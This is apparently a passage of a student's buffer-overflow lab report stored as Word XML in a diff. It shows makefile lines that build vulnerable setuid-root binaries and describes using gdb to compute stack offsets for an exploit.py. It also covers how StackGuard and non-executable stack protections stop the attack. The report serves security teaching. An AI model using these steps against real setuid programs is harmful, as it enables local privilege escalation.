+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>gcc -DBUF_SIZE=$(L2) $(FLAGS) $(FLAGS_32) -o $@ stack.c</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>gcc -DBUF_SIZE=$(L2) $(FLAGS) $(FLAGS_32) -g -o $@-dbg stack.c</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>sudo chown root $@ &amp;&amp; sudo chmod 4755 $@</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>stack-L3: stack.c</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>gcc -DBUF_SIZE=$(L3) $(FLAGS) -o $@ stack.c</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>gcc -DBUF_SIZE=$(L3) $(FLAGS) -g -o $@-dbg stack.c</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>sudo chown root $@ &amp;&amp; sudo chmod 4755 $@</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>stack-L4: stack.c</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>gcc -DBUF_SIZE=$(L4) $(FLAGS) -o $@ stack.c</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>gcc -DBUF_SIZE=$(L4) $(FLAGS) -g -o $@-dbg stack.c</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>sudo chown root $@ &amp;&amp; sudo chmod 4755 $@</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>clean:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>rm -f badfile $(TARGET) peda-session-stack*.txt .gdb_history</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="21">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:align>center</wp:align>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>635</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="6332220" cy="2259330"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="20" name="Image20" descr="" title=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="20" name="Image20" descr="" title=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId21"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6332220" cy="2259330"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:t>T</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:t>he above screenshot verifies recompiling the stack.c program without disabling the stack guard.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:t>Next, I ran through gdb to calculate the distance between ebp and buffer as well as update the return address with the new offset if necessary.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="22">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>-8255</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>-25400</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="6332220" cy="4116070"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="21" name="Image21" descr="" title=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="21" name="Image21" descr="" title=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId22"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6332220" cy="4116070"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:t>A</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:t>s the screenshot shows above, the memory addresses for both ebp and buffer are both different. The distance between ebp and buffer is also different meaning I must update everything in the exploit.py file.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="23">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:align>center</wp:align>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>635</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="6332220" cy="806450"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="22" name="Image22" descr="" title=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="22" name="Image22" descr="" title=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId23"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6332220" cy="806450"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:t>I reran the exploit.py script and ran stack-L1 with the stack-guard protection enabled. I did not get the root shell and instead got a new message which I can only assume is due to the stack-guard noticing the buffer overflow and stopping it.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="24">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:align>center</wp:align>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>635</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="6332220" cy="941705"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="23" name="Image23" descr="" title=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="23" name="Image23" descr="" title=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId24"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6332220" cy="941705"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:t>Task 07-B: Turn on the Non-executable Stack Protection</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:t xml:space="preserve">I  modified the provided makefile </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:t xml:space="preserve">under the shellcode directory </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="25">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>0</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>698500</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="6332220" cy="5552440"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="24" name="Image24" descr="" title=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="24" name="Image24" descr="" title=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId25"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6332220" cy="5552440"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:t>and removed the flag that allows for code on the stack to be executable:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:t xml:space="preserve">I </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:t xml:space="preserve">recompiled the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:t>call_shellcode.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:t>c</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:t>program using the makefile, the output proves that the flag has been removed.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="26">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>2540</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>-107950</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="6332220" cy="1584325"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="25" name="Image25" descr="" title=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="25" name="Image25" descr="" title=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId26"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6332220" cy="1584325"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
